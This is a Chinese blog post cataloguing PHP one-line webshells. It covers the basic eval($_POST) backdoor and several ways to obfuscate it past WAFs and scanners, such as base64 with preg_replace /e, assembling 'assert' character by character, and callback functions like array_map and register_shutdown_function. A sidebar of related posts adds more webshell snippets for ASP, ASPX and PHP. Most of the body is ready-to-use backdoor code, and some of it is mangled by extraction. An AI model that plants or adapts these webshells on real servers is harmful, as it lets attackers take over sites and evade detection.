php一句话论坛,PHP一句话

最新推荐文章于 2022-05-11 15:48:13 发布
最新推荐文章于 2022-05-11 15:48:13 发布
阅读量276 收藏
点赞数
文章标签: php一句话论坛

简单的一句话1@eval($_POST['password']);?>

[email protected]()函数将字符串内容当作php代码执行

而$_POST[]即获取以post方式发送的参数为password的值

整体来说,就是将post获取的值,当作php代码执行。

一句话的变形

1.使用编码的方式

当然简单的一句话肯定会被waf轻易的发现,所以需要对一句话进行变形,以绕过waf的检查

简单的一句话的变形,如利用base64_decode()函数对一句话进行解码进而执行。1

2

3

4

5

6

7

8@$a = $_POST['x'];

if(isset($a)){

@preg_replace("/

(.∗)

/e",'\1',base64_decode('W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10='));

}

?>

其中base64_decode(‘W0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW3owXSkpO10=’))解码后为:[@eval(base64_decode($_POST[z0]));]

还可以使用

2.1使用数组拼接的方式

因为检测后门的时候大多通过检测关键字,危险函数的使用,所以可以通过对一句话的拼接来绕过检测1

2

3

4

5

6

7

8$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i

$func .= $func . $arr[$i];

}

$func($_REQUEST['c']);

?>

以上拼接到一起为assert($_REQUEST[‘c’])

2.2使用ASCII码拼接的方式1 $_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

本质还是拼接

翻译过来为:create_funtion(“”,eval(_POST[1]););

3.使用其他的函数

如函数array_map()对数组中所有元素使用函数处理1

2

3strcasecmp(md5($_GET['qid']),'aaa1fb894b5716d60771e6f230b67e6c')?array_map("asx73ert",(array)$_REQUEST['cmd']):next;

?>

其中array_map(“asx73ert”,(array)$_REQUEST[‘cmd’])使用的函数为assert为放过滤使用”asx73ert”。

或者使用_GET()函数1

2

3@$_GET[a]($_GET[b]);

?>

http://127.0.0.1/test.php?a=assert&b=cmd

preg_replace的/e参数能够在在进行了对替换字符串的 后向引用替换之后, 将替换后的字符串作为php 代码评估执行1preg_replace('/some/e',$_POST[c],'some');

/e参数在php5.5以上就废弃了可以用preg_replace _callback

总结下来一些能执行命令的函数eval

assert

call_user_func

array_map

create_function

preg_replace的/e参数

回掉函数生成后门

1.assert作为回调函数,处理pass参数1call_user_func('assert', $_REQUEST['pass']);

2.数组操作函数

利用对数组进行操作的函数1

2

3

4

5<?php

$e = $_REQUEST['e'];

$arr = array($_POST['pass'],);

array_filter($arr, base64_decode($e));

?>

其中array_filter()函数是将数组中所有元素遍历并用指定函数处理过滤用的

即遍历$arr数组中元素,使用传入的e参数进行调用

array_map(myfunction,array)对数组array使用myfunction处理

但数组回掉函数还是容易被发现和查杀。1

2

3<?php

$e = $_REQUEST['e'];

register_shutdown_function($e, $_REQUEST['pass']);

其中register_shutdown_function()函数是在PHP中止时执行的函数,在PHP中止时执行自定义的回调函数

weixin_39675679
关注
php一句话大全,[各种一句话木马大全]各种一句话
weixin_39995351的博客
03-11 9004
PHP一句话:1、普通一句话2、防爆破一句话 //菜刀地址http://192.168.64.137/x.php?x=mytest 密码:pass3、过狗一句话 //菜刀地址 http://localhost/1.php?s=assert等价于$=@$GET['s'];@$($_POST['pass']);?>4、404隐藏一句话preg_replace()方法中的e,只适用于php5及更早...
PHP、asp、aspx、JSP一句话
aojing4957的博客
09-20 1778
1、asp一句话木马: <%eval request(“x”)%> 2、php一句话木马: <?php eval($_POST[g]);?> 3、aspx一句话: <%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%> 4、数据库加密一句话(密码a):...
PHP一句话 免杀版
10-23
PHP一句话 免杀版
PHP一句话
weixin_34054866的博客
12-20 2494
<?php @eval($_POST[pp]);?> 这是一段PHP木马代码,也就是我们所说的后门程序 为什么说这段代码是后门程序? 其实这段代码属于基础类的一句话,功能仅限于验证漏洞了,实际中太容易被查出来了, 这个是PHP最常见的一句话木马的源码,通过post木马程序来实现木马的植入,eval()函数把字符串按照PHP代码来计算 就这一句话害死人,这样任何人都可以post...
php简单一句话分析
weixin_30878501的博客
07-14 169
1 <?php 2 $arr="j{fq-)dUTXY`}b.@"; 3 for($i=0;$i< strlen($arr);$i++){ 4 $arr[$i]=chr(ord($arr[$i])-5); 5 }eval($arr); 6 ?> 0x00函数: strlen() //函数返回字符串的长度。chr() // 函数从指定的 A...
有趣的PHP一句话
aijin3040的博客
07-16 199
今天看到如下图所示的PHP一句话,觉得挺有意思。 代码如下: <?=~$_='$<>/'^'{{{{';echo $_;@${$_}[_](@${$_}[__]);?> 效果图: 看下图注释应该就可以一目了然了,就是根据异或运算得到$_=’_GET’。 如果想换成POST方法,则可变化如下。 <?=~$_='$+...
php一句话cmdshell新型 (非一句话木马)
10-30
PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
php实现批量查询清除一句话后门的代码
10-30
在这个文件中,我们主要了解到如何使用PHP编写一个批量查询并清除网站中的"一句话后门"的脚本。一句话后门是一种常见的网页木马攻击方式,攻击者通过在网页代码中插入一段简短的恶意代码来获取网站的控制权。因其...
阿里云的语音识别(一句话识别) SDK PHP代码实现
10-24
在阿里云上的语音识别竟然没有PHP的SDK,而通过他们官方的所谓PHP的openSDK根本也没办法使用,于是,我基于他们的JAVA SDK改写成了PHP SDK,绝对可用!! 里面有些类是挪用了阿里云的官方php OpenSDK中core的代码 ...
阿里云语音识别一句话RESTFUL识别PHP demo
07-26
阿里云语音识别一句话RESTFUL识别PHP demo,由于阿里云语音识别1.0与2.0产品不同,如果提示“Invalid PK is empty or not register”,请前往“https://help.aliyun.com/document_detail/30437.html”开通
php随机一句话,PHP简单实现一言 / 随机一句功能
weixin_28764661的博客
03-11 588
// 存储数据的文件$filename = 'data.dat';// 指定页面编码header('Content-type: text/html; charset=utf-8');if(!file_exists($filename)) {die($filename . ' 数据文件不存在');}// 读取整个数据文件$data = file_get_contents($filename);// ...
深入浅出玩转php一句话(含过waf新姿势)
热门推荐
wjy397的专栏
01-10 1万+
本帖最后由 sucppVK 于 2017-1-9 14:39 编辑 一、前言 本文原创作者:XXX,本文属i春秋原创奖励计划,未经许可禁止转载! 各个论坛出了不少过waf的一句话 可笔者见还是有不少小白没有理解一句话(只知道是拿来链接菜刀) 今天打算做一篇面向初学者的教程,总结知识点,抛砖引玉。 让小白从彻底理解马的含义,到打造属于自己过waf的马。 ----
PHP一句话木马免杀
墨痕诉清风的博客
10-07 6044
目录 免杀小技巧 1.字符串拼接方式,构造敏感函数。 2.通过PHP的动态函数方法执行一句话。 3.利用php异或^构造字符串 免杀木马构造 一句话测试 异或转码数据 小结 免杀小技巧 1.字符串拼接方式,构造敏感函数。 <?php $a = 'ass'; $b = 'er'; $c = 't'; $d = $a.$b.$c; //assert 2.通过PHP的动态函数方法执行一句话。 <?php $a = 'assert'; $b = '_GET'; $a(.
php一句话怎么写_php最新变异一句话
weixin_32185607的博客
03-08 143
注释:站长的任务又加重了,好好认识下,以后见了好清除本来匿名发在土司上,现在应该传出去了,两个是来自国外的http://h.ackack.net/tiny-php-shell.htmlhttp://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/具体看国外的文章吧第一种:1.php=($_=@$_GET[2]).@$_($_...
php 一句话木马简介
whatday的专栏
07-01 1万+
一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 <?php @eval($_POST['shell']);?> 这是php一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: <?php @ev
PHP一句话木马免杀学习
qq_45780190的博客
05-11 3304
PHP一句话木马免杀学习 简单了解php一句话木马原理 <?php @eval($_POST['shell']);?> 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo(); 一句话木马的变形 常用变形函数 convert_uudecode() #解码一个
科迅免杀php一句话_PHP一句话木马Webshell变形免杀总结
weixin_39721370的博客
12-21 371
0×00 前言大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖.0×01 字符串上的舞蹈一般标准的一句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下:@eval ($_POST[xxxxx]);很明显的eva...
Webshell一句话攻击技巧:PHP、ASP、JSP常见实现与防范
1. PHP一句话Webshell示例: PHP中的一句话Webshell通常使用`eval()`函数执行用户提交的命令。例如,`<?php eval($_POST['cmd']); ?>`允许攻击者输入任意代码,服务器会执行这些代码,生成一个后门。 2. ASP.NET和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值